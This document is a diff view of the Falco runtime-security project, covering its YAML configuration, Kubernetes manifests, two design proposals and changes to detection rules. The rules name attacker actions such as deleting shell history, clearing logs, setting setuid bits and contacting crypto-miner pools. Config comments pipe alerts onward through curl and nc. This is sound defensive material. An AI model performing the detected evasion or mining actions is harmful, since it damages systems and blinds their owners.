# If true, the times displayed in log messages and output messages
# will be in ISO 8601. By default, times are displayed in the local
# time zone, as governed by /etc/localtime.
time_format_iso_8601: false
# Whether to output events in json or text
json_output: true
# When using json output, whether or not to include the "output" property
# itself (e.g. "File below a known binary directory opened for writing
# (user=root ....") in the json output.
json_include_output_property: true
# Send information logs to stderr and/or syslog Note these are *not* security
# notification logs! These are just Falco lifecycle (and possibly error) logs.
log_stderr: true
log_syslog: true
# Minimum log level to include in logs. Note: these levels are
# separate from the priority field of rules. This refers only to the
# log level of falco's internal logging. Can be one of "emergency",
# "alert", "critical", "error", "warning", "notice", "info", "debug".
log_level: info
# Minimum rule priority level to load and run. All rules having a
# priority more severe than this level will be loaded/run. Can be one
# of "emergency", "alert", "critical", "error", "warning", "notice",
# "info", "debug".
priority: debug
# Whether or not output to any of the output channels below is
# buffered. Defaults to false
buffered_outputs: false
# Falco uses a shared buffer between the kernel and userspace to pass
# system call information. When falco detects that this buffer is
# full and system calls have been dropped, it can take one or more of
# the following actions:
# - "ignore": do nothing. If an empty list is provided, ignore is assumed.
# - "log": log a CRITICAL message noting that the buffer was full.
# - "alert": emit a falco alert noting that the buffer was full.
# - "exit": exit falco with a non-zero rc.
#
# The rate at which log/alert messages are emitted is governed by a
# token bucket. The rate corresponds to one message every 30 seconds
# with a burst of 10 messages.
syscall_event_drops:
actions:
- log
- alert
rate: .03333
max_burst: 10
# A throttling mechanism implemented as a token bucket limits the
# rate of falco notifications. This throttling is controlled by the following configuration
# options:
# - rate: the number of tokens (i.e. right to send a notification)
# gained per second. Defaults to 1.
# - max_burst: the maximum number of tokens outstanding. Defaults to 1000.
#
# With these defaults, falco could send up to 1000 notifications after
# an initial quiet period, and then up to 1 notification per second
# afterward. It would gain the full burst back after 1000 seconds of
# no activity.
outputs:
rate: 1
max_burst: 1000
# Where security notifications should go.
# Multiple outputs can be enabled.
syslog_output:
enabled: true
# If keep_alive is set to true, the file will be opened once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the file will be re-opened
# for each output message.
#
# Also, the file will be closed and reopened if falco is signaled with
# SIGUSR1.
file_output:
enabled: false
keep_alive: false
filename: ./events.txt
stdout_output:
enabled: true
# Falco contains an embedded webserver that can be used to accept K8s
# Audit Events. These config options control the behavior of that
# webserver. (By default, the webserver is disabled).
#
# The ssl_certificate is a combination SSL Certificate and corresponding
# key contained in a single file. You can generate a key/cert as follows:
#
# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
# $ cat certificate.pem key.pem > falco.pem
# $ sudo cp falco.pem /etc/falco/falco.pem
webserver:
enabled: true
listen_port: 8765
k8s_audit_endpoint: /k8s_audit
ssl_enabled: false
ssl_certificate: /etc/falco/falco.pem
# Possible additional things you might want to do with program output:
# - send to a slack webhook:
# program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
# - logging (alternate method than syslog):
# program: logger -t falco-test
# - send over a network connection:
# program: nc host.example.com 80
# If keep_alive is set to true, the program will be started once and
# continuously written to, with each output message on its own
# line. If keep_alive is set to false, the program will be re-spawned
# for each output message.
#
# Also, the program will be closed and reopened if falco is signaled with
# SIGUSR1.
program_output:
enabled: false
keep_alive: false
program: "jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX"
http_output:
enabled: false
url: http://some.url

38
integrations/k8s-using-deployment/k8s-with-rbac/falco-k8s-audit-account.yaml
View File

@@ -1,38 +0,0 @@
apiVersion: v1
kind: ServiceAccount
metadata:
name: falco-account
labels:
app: falco-k8s-audit
role: security
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: falco-cluster-role
labels:
app: falco-k8s-audit
role: security
rules:
- apiGroups: ["extensions",""]
resources: ["nodes","namespaces","pods","replicationcontrollers","replicasets","services","daemonsets","deployments","events","configmaps"]
verbs: ["get","list","watch"]
- nonResourceURLs: ["/healthz", "/healthz/*"]
verbs: ["get"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: falco-cluster-role-binding
namespace: default
labels:
app: falco-k8s-audit
role: security
subjects:
- kind: ServiceAccount
name: falco-account
namespace: default
roleRef:
kind: ClusterRole
name: falco-cluster-role
apiGroup: rbac.authorization.k8s.io

32
integrations/k8s-using-deployment/k8s-with-rbac/falco-k8s-audit-deployment.yaml
View File

@@ -1,32 +0,0 @@
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: falco-k8s-audit
labels:
app: falco-k8s-audit
role: security
spec:
replicas: 1
selector:
matchLabels:
app: falco-k8s-audit
template:
metadata:
labels:
app: falco-k8s-audit
role: security
spec:
serviceAccount: falco-account
containers:
- name: falco
image: falcosecurity/falco:latest
securityContext:
privileged: true
args: [ "/usr/bin/falco", "--disable-source", "syscall", "-K", "/var/run/secrets/kubernetes.io/serviceaccount/token", "-k", "https://$(KUBERNETES_SERVICE_HOST)", "-pk"]
volumeMounts:
- mountPath: /etc/falco
name: falco-config
volumes:
- name: falco-config
configMap:
name: falco-config

13
integrations/k8s-using-deployment/k8s-with-rbac/falco-k8s-audit-service.yaml
View File

@@ -1,13 +0,0 @@
kind: Service
apiVersion: v1
metadata:
name: falco-k8s-audit
labels:
app: falco-k8s-audit
role: security
spec:
selector:
app: falco-k8s-audit
ports:
- protocol: TCP
port: 8765

3
integrations/puppet-module/sysdig-falco/templates/falco.yaml.erb
View File

@@ -3,8 +3,9 @@
####
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

BIN
proposals/20190826-grpc-output-single-alert-sequence.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 41 KiB

113
proposals/20190826-grpc-outputs.md
View File

@@ -1,113 +0,0 @@
# gRPC Falco Output
<!-- toc -->
- [Summary](#summary)
- [Motivation](#motivation)
* [Goals](#goals)
* [Non-Goals](#non-goals)
- [Proposal](#proposal)
* [Use cases](#use-cases)
* [Diagrams](#diagrams)
* [Design Details](#design-details)
<!-- tocstop -->
## Summary
We intend to build a simple gRPC server and SDKs - eg., [falco#785](https://github.com/falcosecurity/falco/issues/785) - to allow users receive and consume the alerts regarding the violated rules.
## Motivation
The most valuable information that Falco can give to its users are the alerts.
An alert is an "output" when it goes over a transport, and it is emitted by Falco every time a rule is matched.
At the current moment, however, Falco can deliver alerts in a very basic way, for example by dumping them to standard output.
For this reason, many Falco users asked, with issues - eg., [falco#528](https://github.com/falcosecurity/falco/issues/528) - or in the [slack channel](https://sysdig.slack.com) if we can find a more consumable way to implement Falco outputs in an extensible way.
The motivation behind this proposal is to design a new output implementation that can meet our user's needs.
### Goals
- To decouple the outputs from the Falco code base
- To design and implement an additional output mode by mean of a gRPC **streaming** server
- To keep it as simple as possible
- To have a simple contract interface
- To only have the responsibility to route Falco output requests and responses
- To continue supporting the old output formats by implementing their same interface
- To be secure by default (**mutual TLS** authentication)
- To be **asynchronous** and **non-blocking**
- To implement a Go SDK
### Non-Goals
- To substitute existing outputs (stdout, syslog, etc.)
- To support different queing systems than the default (round-robin) one
- To support queuing mechanisms for message retransmission
- Users can have a local gRPC relay server along with Falco that multiplexes connections and handles retires and backoff
- To change the output format
- To make the message context (text, fields, etc.) and format configurable
- Users can already override rules changing their output messages
- To act as an orchestrator for Falco instances
## Proposal
### Use cases
- Receive Falco events with a well-defined contract over wire
- Integrate Falco events with existing alerting/paging mechanisms
- Integrate Falco events with existing monitoring infrastructures/tools
- Falco outputs SDKs for different languages
### Diagrams
The following sequence diagram illustrates the flow happening for a single rule being matched and the consequent alert through the gRPC output client.
![Single alert sequence diagram](20190826-grpc-output-single-alert-sequence.png)
### Design Details
Here is the proto3 contracts definitions for the client and the server SDK.
```proto3
syntax = "proto3";
import "google/protobuf/timestamp.proto";
import "schema.proto";
package falco.output;
option go_package = "github.com/falcosecurity/client-go/pkg/api/output";
// The `subscribe` service defines the RPC call
// to perform an output `request` which will lead to obtain an output `response`.
service service {
rpc subscribe(request) returns (stream response);
}
// The `request` message is the logical representation of the request model.
// It is the input of the `subscribe` service.
// It is used to configure the kind of subscription to the gRPC streaming server.
message request {
bool keepalive = 1;
// string duration = 2; // TODO(leodido, fntlnz): not handled yet but keeping for reference.
// repeated string tags = 3; // TODO(leodido, fntlnz): not handled yet but keeping for reference.
}
// The `response` message is the logical representation of the output model.
// It contains all the elements that Falco emits in an output along with the
// definitions for priorities and source.
message response {
google.protobuf.Timestamp time = 1;
falco.schema.priority priority = 2;
falco.schema.source source = 3;
string rule = 4;
string output = 5;
map<string, string> output_fields = 6;
// repeated string tags = 7; // TODO(leodido,fntlnz): tags not supported yet, keeping for reference
}
```
---

56
proposals/20190909-psp-rules-support.md
View File

@@ -1,56 +0,0 @@
# Support for K8s Pod Security Policies (PSPs) in Falco
<!-- toc -->
- [Summary](#summary)
- [Motivation](#motivation)
* [Goals](#goals)
* [Non-Goals](#non-goals)
- [Proposal](#proposal)
* [Use cases](#use-cases)
* [Diagrams](#diagrams)
* [Design Details](#design-details)
<!-- tocstop -->
## Summary
We want to make it easier for K8s Cluster Operators to Author Pod Security Policies by providing a way to read a PSP, convert it to a set of Falco rules, and then run Falco with those rules.
## Motivation
PSPs provide a rich powerful framework to restrict the behavior of pods and apply consistent security policies across a cluster, but its difficult to know the gap between what you want your security policy to be and what your cluster is actually doing. Additionally, since PSPs enforce once applied, they might prevent pods from running, and the process of tuning a PSP live on a cluster can be disruptive and painful.
That's where Falco comes in. We want to make it possible for Falco to perform a "dry run" evaluation of a PSP, translating it to Falco rules that observe the behaviour of deployed pods and sending alerts for violations, *without* blocking. This helps accelerate the authoring cycle, providing a complete authoring framework for PSPs without deploying straight to the cluster.
### Goals
Transparently read a candidate PSP into an equivalent set of Falco rules that can look for the conditions in the PSP.
The PSP is converted into a set of Falco rules which can be either saved as a file for later use/inspection, or loaded directly so they they can monitor system calls and k8s audit activity.
### Non-Goals
Falco will not automatically read PSPs from a cluster, will not install PSPs, and will not provide guidance on the parts of your infrastructure that are already covered by PSPs. This feature only helps with the testing part of a candidate PSP. For coming up with an initial PSP, you can use tools like [https://github.com/sysdiglabs/kube-psp-advisor](Kube PSP Advisor).
The use case here is for cluster operators who want to author PSPs, but don't want to just put it in a cluster and see what breaks. For example, if your PSP sets privileged to false, but it turns out some of your pods are running privileged, they won't be able to start.
With this feature, they could iterate without enforcement until they have a PSP that matches the actual behaviour of their cluster. Some of that will come from changing the PSP, some of that will come from changing the behaviour of the cluster. The important part is that it's not mistakenly preventing things from running while you're figuring it out.
## Proposal
### Use cases
You'll be able to run falco with a `--psp` argument that provides a single PSP yaml file. Falco will automatically convert the PSP into an equivalent set of Falco rules, load the rules, and then run with the loaded rules. You can optionally provide a `--psp_save=<path>` command line option to save the converted rules to a file.
### Diagrams
No diagrams yet.
### Design Details
* We'll use [inja](https://github.com/pantor/inja) as the templating engine.
* For the most part, we can rely on the existing framework of rules, filter expressions, and output expressions that already exist in Falco. One significant change will be that filter fields can extract more than one "value" per event, and we'll need to define new operators to perform set comparisions betweeen values in an event and values in the comparison right-hand-side.
* This will rely heavily on existing support for [K8s Audit Events](https://falco.org/docs/event-sources/kubernetes-audit/) in Falco.

3
rules/CMakeLists.txt
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco .
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

2
rules/OWNERS
View File

@@ -7,6 +7,4 @@ reviewers:
- mfdii
- kaizhe
- mstemm
labels:
- area/rules

3
rules/application_rules.yaml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

3
rules/falco_rules.local.yaml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.

190
rules/falco_rules.yaml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@@ -71,9 +72,6 @@
- macro: create_symlink
condition: evt.type in (symlink, symlinkat) and evt.dir=<
- macro: chmod
condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
# File categories
- macro: bin_dir
condition: fd.directory in (/bin, /sbin, /usr/bin, /usr/sbin)
@@ -113,7 +111,7 @@
items: [add-shell, remove-shell]
- macro: shell_procs
condition: proc.name in (shell_binaries)
condition: (proc.name in (shell_binaries))
- list: coreutils_binaries
items: [
@@ -898,9 +896,6 @@
- macro: calico_writing_state
condition: (proc.name=kube-controller and fd.name startswith /status.json and k8s.pod.name startswith calico)
- macro: calico_writing_envvars
condition: (proc.name=start_runit and fd.name startswith "/etc/envvars" and container.image.repository endswith "calico/node")
- list: repository_files
items: [sources.list]
@@ -910,15 +905,12 @@
- macro: access_repositories
condition: (fd.filename in (repository_files) or fd.directory in (repository_directories))
- macro: modify_repositories
condition: (evt.arg.newpath pmatch (repository_directories))
- rule: Update Package Repository
desc: Detect package repositories get updated
condition: >
((open_write and access_repositories) or (modify and modify_repositories)) and not package_mgmt_procs
open_write and access_repositories and not package_mgmt_procs
output: >
Repository files get updated (user=%user.name command=%proc.cmdline file=%fd.name newpath=%evt.arg.newpath container_id=%container.id image=%container.image.repository)
Repository files get updated (user=%user.name command=%proc.cmdline file=%fd.name container_id=%container.id image=%container.image.repository)
priority:
NOTICE
tags: [filesystem, mitre_persistence]
@@ -1254,7 +1246,6 @@
and not istio_writing_conf
and not ufw_writing_conf
and not calico_writing_conf
and not calico_writing_envvars
and not prometheus_conf_writing_conf
and not openshift_writing_conf
and not keepalived_writing_conf
@@ -1274,7 +1265,7 @@
- list: known_root_files
items: [/root/.monit.state, /root/.auth_tokens, /root/.bash_history, /root/.ash_history, /root/.aws/credentials,
/root/.viminfo.tmp, /root/.lesshst, /root/.bzr.log, /root/.gitconfig.lock, /root/.babel.json, /root/.localstack,
/root/.node_repl_history, /root/.mongorc.js, /root/.dbshell, /root/.augeas/history, /root/.rnd, /root/.wget-hsts, /health, /exec.fifo]
/root/.node_repl_history, /root/.mongorc.js, /root/.dbshell, /root/.augeas/history, /root/.rnd, /root/.wget-hsts, /health]
- list: known_root_directories
items: [/root/.oracle_jre_usage, /root/.ssh, /root/.subversion, /root/.nami]
@@ -1421,12 +1412,6 @@
priority: WARNING
tags: [filesystem, mitre_credential_access, mitre_discovery]
- macro: amazon_linux_running_python_yum
condition: >
(proc.name = python and
proc.pcmdline = "python -m amazon_linux_extras system_motd" and
proc.cmdline startswith "python -c import yum;")
# Only let rpm-related programs write to the rpm database
- rule: Write below rpm database
desc: an attempt to write to the rpm database by any non-rpm related program
@@ -1436,7 +1421,6 @@
and not ansible_running_python
and not python_running_chef
and not exe_running_docker_save
and not amazon_linux_running_python_yum
output: "Rpm database opened for writing by a non-rpm program (command=%proc.cmdline file=%fd.name parent=%proc.pname pcmdline=%proc.pcmdline container_id=%container.id image=%container.image.repository)"
priority: ERROR
tags: [filesystem, software_mgmt, mitre_persistence]
@@ -1754,7 +1738,7 @@
- list: falco_privileged_images
items: [
docker.io/sysdig/agent, docker.io/sysdig/falco, docker.io/sysdig/sysdig,
gcr.io/google_containers/kube-proxy, docker.io/calico/node, quay.io/calico/node,
gcr.io/google_containers/kube-proxy, docker.io/calico/node,
docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/mesosphere/mesos-slave,
docker.io/docker/ucp-agent, sematext_images, k8s.gcr.io/kube-proxy
]
@@ -1790,9 +1774,7 @@
gcr.io/google_containers/hyperkube,
gcr.io/google_containers/kube-proxy, docker.io/calico/node,
docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
docker.io/datadog/docker-dd-agent, docker.io/datadog/agent, docker.io/docker/ucp-agent, docker.io/gliderlabs/logspout,
docker.io/netdata/netdata, docker.io/google/cadvisor, docker.io/prom/node-exporter,
amazon/amazon-ecs-agent
docker.io/datadog/docker-dd-agent, docker.io/datadog/agent, docker.io/docker/ucp-agent, docker.io/gliderlabs/logspout
]
- macro: falco_sensitive_mount_containers
@@ -2359,17 +2341,12 @@
- macro: allowed_clear_log_files
condition: (never_true)
- macro: trusted_logging_images
condition: (container.image.repository endswith "splunk/fluentd-hec" or
container.image.repository endswith "fluent/fluentd-kubernetes-daemonset")
- rule: Clear Log Activities
desc: Detect clearing of critical log files
condition: >
open_write and
access_log_files and
evt.arg.flags contains "O_TRUNC" and
not trusted_logging_images and
not allowed_clear_log_files
output: >
Log files were tampered (user=%user.name command=%proc.cmdline file=%fd.name container_id=%container.id image=%container.image.repository)
@@ -2392,61 +2369,29 @@
WARNING
tags: [process, mitre_persistence]
- rule: Delete or rename shell history
desc: Detect shell history deletion
condition: >
(modify and (
evt.arg.name contains "bash_history" or
evt.arg.name contains "zsh_history" or
evt.arg.name contains "fish_read_history" or
evt.arg.name endswith "fish_history" or
evt.arg.oldpath contains "bash_history" or
evt.arg.oldpath contains "zsh_history" or
evt.arg.oldpath contains "fish_read_history" or
evt.arg.oldpath endswith "fish_history" or
evt.arg.path contains "bash_history" or
evt.arg.path contains "zsh_history" or
evt.arg.path contains "fish_read_history" or
evt.arg.path endswith "fish_history")) or
(open_write and (
fd.name contains "bash_history" or
fd.name contains "zsh_history" or
fd.name contains "fish_read_history" or
fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
output: >
Shell history had been deleted or renamed (user=%user.name type=%evt.type command=%proc.cmdline fd.name=%fd.name name=%evt.arg.name path=%evt.arg.path oldpath=%evt.arg.oldpath %container.info)
priority:
WARNING
tag: [process, mitre_defense_evation]
# This rule is deprecated and will/should never be triggered. Keep it here for backport compatibility.
# Rule Delete or rename shell history is the preferred rule to use now.
- rule: Delete Bash History
desc: Detect bash history deletion
condition: >
((spawned_process and proc.name in (shred, rm, mv) and proc.args contains "bash_history") or
((spawned_process and proc.name in (shred, rm, mv) and proc.args contains "bash_history") or
(open_write and fd.name contains "bash_history" and evt.arg.flags contains "O_TRUNC"))
output: >
Shell history had been deleted or renamed (user=%user.name type=%evt.type command=%proc.cmdline fd.name=%fd.name name=%evt.arg.name path=%evt.arg.path oldpath=%evt.arg.oldpath %container.info)
Bash history has been deleted (user=%user.name command=%proc.cmdline file=%fd.name %container.info)
priority:
WARNING
tag: [process, mitre_defense_evation]
- macro: consider_all_chmods
condition: (always_true)
- list: user_known_chmod_applications
items: []
condition: (never_true)
- rule: Set Setuid or Setgid bit
desc: >
When the setuid or setgid bits are set for an application,
this means that the application will run with the privileges of the owning user or group respectively.
Detect setuid or setgid bits set via chmod
condition: consider_all_chmods and chmod and (evt.arg.mode contains "S_ISUID" or evt.arg.mode contains "S_ISGID") and not proc.cmdline in (user_known_chmod_applications)
condition: consider_all_chmods and spawned_process and proc.name = "chmod" and (proc.args contains "+s" or proc.args contains "4777")
output: >
Setuid or setgid bit is set via chmod (fd=%evt.arg.fd filename=%evt.arg.filename mode=%evt.arg.mode user=%user.name
command=%proc.cmdline container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
Setuid or setgid bit is set via chmod (user=%user.name command=%proc.cmdline
container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
priority:
NOTICE
tag: [process, mitre_persistence]
@@ -2461,14 +2406,12 @@
- rule: Create Hidden Files or Directories
desc: Detect hidden files or directories created
condition: >
(consider_hidden_file_creation and (
(modify and evt.arg.newpath contains "/.") or
(mkdir and evt.arg.path contains "/.") or
(open_write and evt.arg.flags contains "O_CREAT" and fd.name contains "/." and not fd.name pmatch (exclude_hidden_directories)))
)
((mkdir and consider_hidden_file_creation and evt.arg.path contains "/.") or
(open_write and consider_hidden_file_creation and evt.arg.flags contains "O_CREAT" and
fd.name contains "/." and not fd.name pmatch (exclude_hidden_directories)))
output: >
Hidden file or directory created (user=%user.name command=%proc.cmdline
file=%fd.name newpath=%evt.arg.newpath container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
file=%fd.name container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
priority:
NOTICE
tag: [file, mitre_persistence]
@@ -2498,103 +2441,6 @@
Symlinks created over senstivie files (user=%user.name command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
priority: NOTICE
tags: [file, mitre_exfiltration]
- list: miner_ports
items: [
25, 3333, 3334, 3335, 3336, 3357, 4444,
5555, 5556, 5588, 5730, 6099, 6666, 7777,
7778, 8000, 8001, 8008, 8080, 8118, 8333,
8888, 8899, 9332, 9999, 14433, 14444,
45560, 45700
]
- list: miner_domains
items: [
"asia1.ethpool.org","ca.minexmr.com",
"cn.stratum.slushpool.com","de.minexmr.com",
"eth-ar.dwarfpool.com","eth-asia.dwarfpool.com",
"eth-asia1.nanopool.org","eth-au.dwarfpool.com",
"eth-au1.nanopool.org","eth-br.dwarfpool.com",
"eth-cn.dwarfpool.com","eth-cn2.dwarfpool.com",
"eth-eu.dwarfpool.com","eth-eu1.nanopool.org",
"eth-eu2.nanopool.org","eth-hk.dwarfpool.com",
"eth-jp1.nanopool.org","eth-ru.dwarfpool.com",
"eth-ru2.dwarfpool.com","eth-sg.dwarfpool.com",
"eth-us-east1.nanopool.org","eth-us-west1.nanopool.org",
"eth-us.dwarfpool.com","eth-us2.dwarfpool.com",
"eu.stratum.slushpool.com","eu1.ethermine.org",
"eu1.ethpool.org","fr.minexmr.com",
"mine.moneropool.com","mine.xmrpool.net",
"pool.minexmr.com","pool.monero.hashvault.pro",
"pool.supportxmr.com","sg.minexmr.com",
"sg.stratum.slushpool.com","stratum-eth.antpool.com",
"stratum-ltc.antpool.com","stratum-zec.antpool.com",
"stratum.antpool.com","us-east.stratum.slushpool.com",
"us1.ethermine.org","us1.ethpool.org",
"us2.ethermine.org","us2.ethpool.org",
"xmr-asia1.nanopool.org","xmr-au1.nanopool.org",
"xmr-eu1.nanopool.org","xmr-eu2.nanopool.org",
"xmr-jp1.nanopool.org","xmr-us-east1.nanopool.org",
"xmr-us-west1.nanopool.org","xmr.crypto-pool.fr",
"xmr.pool.minergate.com"
]
- list: https_miner_domains
items: [
"ca.minexmr.com",
"cn.stratum.slushpool.com",
"de.minexmr.com",
"fr.minexmr.com",
"mine.moneropool.com",
"mine.xmrpool.net",
"pool.minexmr.com",
"sg.minexmr.com",
"stratum-eth.antpool.com",
"stratum-ltc.antpool.com",
"stratum-zec.antpool.com",
"stratum.antpool.com",
"xmr.crypto-pool.fr"
]
- list: http_miner_domains
items: [
"ca.minexmr.com",
"de.minexmr.com",
"fr.minexmr.com",
"mine.moneropool.com",
"mine.xmrpool.net",
"pool.minexmr.com",
"sg.minexmr.com",
"xmr.crypto-pool.fr"
]
# Add rule based on crypto mining IOCs
- macro: minerpool_https
condition: (fd.sport="443" and fd.sip.name in (https_miner_domains))
- macro: minerpool_http
condition: (fd.sport="80" and fd.sip.name in (http_miner_domains))
- macro: minerpool_other
condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
- macro: net_miner_pool
condition: (evt.type in (sendto, sendmsg) and evt.dir=< and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
- rule: Detect outbound connections to common miner pool ports
desc: Miners typically connect to miner pools on common ports.
condition: net_miner_pool
output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
priority: CRITICAL
tags: [network, mitre_execution]
- rule: Detect crypto miners using the Stratum protocol
desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
condition: spawned_process and proc.cmdline contains "stratum+tcp"
output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
priority: CRITICAL
tags: [process, mitre_execution]
# Application rules have moved to application_rules.yaml. Please look
# there if you want to enable them by adding to
# falco_rules.local.yaml.

42
rules/k8s_audit_rules.yaml
View File

@@ -1,6 +1,7 @@
#
# Copyright (C) 2019 The Falco Authors.
# Copyright (C) 2016-2018 Draios Inc dba Sysdig.
#
# This file is part of falco.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
@@ -39,9 +40,8 @@
condition: (jevt.value[/stage]=ResponseStarted)
# If you wish to restrict activity to a specific set of users, override/append to this list.
# users created by kops are included
- list: allowed_k8s_users
items: ["minikube", "minikube-user", "kubelet", "kops", "admin", "kube", "kube-proxy"]
items: ["minikube", "minikube-user", "kubelet", "kops"]
- rule: Disallowed K8s User
desc: Detect any k8s operation by users outside of an allowed set of users.
@@ -56,7 +56,7 @@
# your environment. In this main falco rules file, there isn't any way
# to know all the containers that can run, so any container is
# allowed, by using the always_true macro. In the overridden macro, the condition
# would look something like (ka.req.pod.containers.image.repository in (my-repo/my-image))
# would look something like (ka.req.container.image.repository=my-repo/my-image)
- macro: allowed_k8s_containers
condition: (k8s_audit_always_true)
@@ -109,7 +109,7 @@
desc: >
Detect an attempt to start a pod with a container image outside of a list of allowed images.
condition: kevt and pod and kcreate and not allowed_k8s_containers
output: Pod started with container not in allowed list (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
output: Pod started with container not in allowed list (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace image=%ka.req.container.image)
priority: WARNING
source: k8s_audit
tags: [k8s]
@@ -117,22 +117,26 @@
- rule: Create Privileged Pod
desc: >
Detect an attempt to start a pod with a privileged container
condition: kevt and pod and kcreate and ka.req.pod.containers.privileged intersects (true) and not ka.req.pod.containers.image.repository in (falco_privileged_images)
output: Pod started with privileged container (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
condition: kevt and pod and kcreate and ka.req.container.privileged=true and not ka.req.container.image.repository in (falco_privileged_images)
output: Pod started with privileged container (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace image=%ka.req.container.image)
priority: WARNING
source: k8s_audit
tags: [k8s]
- macro: sensitive_vol_mount
condition: >
(ka.req.pod.volumes.hostpath intersects (/proc, /var/run/docker.sock, /, /etc, /root))
(ka.req.volume.hostpath[/proc*]=true or
ka.req.volume.hostpath[/var/run/docker.sock]=true or
ka.req.volume.hostpath[/]=true or
ka.req.volume.hostpath[/etc]=true or
ka.req.volume.hostpath[/root*]=true)
- rule: Create Sensitive Mount Pod
desc: >
Detect an attempt to start a pod with a volume from a sensitive host directory (i.e. /proc).
Exceptions are made for known trusted images.
condition: kevt and pod and kcreate and sensitive_vol_mount and not ka.req.pod.containers.image.repository in (falco_sensitive_mount_images)
output: Pod started with sensitive mount (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image volumes=%jevt.value[/requestObject/spec/volumes])
condition: kevt and pod and kcreate and sensitive_vol_mount and not ka.req.container.image.repository in (falco_sensitive_mount_images)
output: Pod started with sensitive mount (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace image=%ka.req.container.image mounts=%jevt.value[/requestObject/spec/volumes])
priority: WARNING
source: k8s_audit
tags: [k8s]
@@ -140,8 +144,8 @@
# Corresponds to K8s CIS Benchmark 1.7.4
- rule: Create HostNetwork Pod
desc: Detect an attempt to start a pod using the host network.
condition: kevt and pod and kcreate and ka.req.pod.host_network intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostnetwork_images)
output: Pod started using host network (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
condition: kevt and pod and kcreate and ka.req.container.host_network=true and not ka.req.container.image.repository in (falco_hostnetwork_images)
output: Pod started using host network (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace image=%ka.req.container.image)
priority: WARNING
source: k8s_audit
tags: [k8s]
@@ -217,7 +221,7 @@
- rule: Pod Created in Kube Namespace
desc: Detect any attempt to create a pod in the kube-system or kube-public namespaces
condition: kevt and pod and kcreate and ka.target.namespace in (kube-system, kube-public)
output: Pod created in kube namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
output: Pod created in kube namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace image=%ka.req.container.image)
priority: WARNING
source: k8s_audit
tags: [k8s]
@@ -254,7 +258,7 @@
- rule: ClusterRole With Wildcard Created
desc: Detect any attempt to create a Role/ClusterRole with wildcard resources or verbs
condition: kevt and (role or clusterrole) and kcreate and (ka.req.role.rules.resources intersects ("*") or ka.req.role.rules.verbs intersects ("*"))
condition: kevt and (role or clusterrole) and kcreate and (ka.req.role.rules.resources contains '"*"' or ka.req.role.rules.verbs contains '"*"')
output: Created Role/ClusterRole with wildcard (user=%ka.user.name role=%ka.target.name rules=%ka.req.role.rules)
priority: WARNING
source: k8s_audit
@@ -262,7 +266,11 @@
- macro: writable_verbs
condition: >
(ka.req.role.rules.verbs intersects (create, update, patch, delete, deletecollection))
(ka.req.role.rules.verbs contains create or
ka.req.role.rules.verbs contains update or
ka.req.role.rules.verbs contains patch or
ka.req.role.rules.verbs contains delete or
ka.req.role.rules.verbs contains deletecollection)
- rule: ClusterRole With Write Privileges Created
desc: Detect any attempt to create a Role/ClusterRole that can perform write-related actions
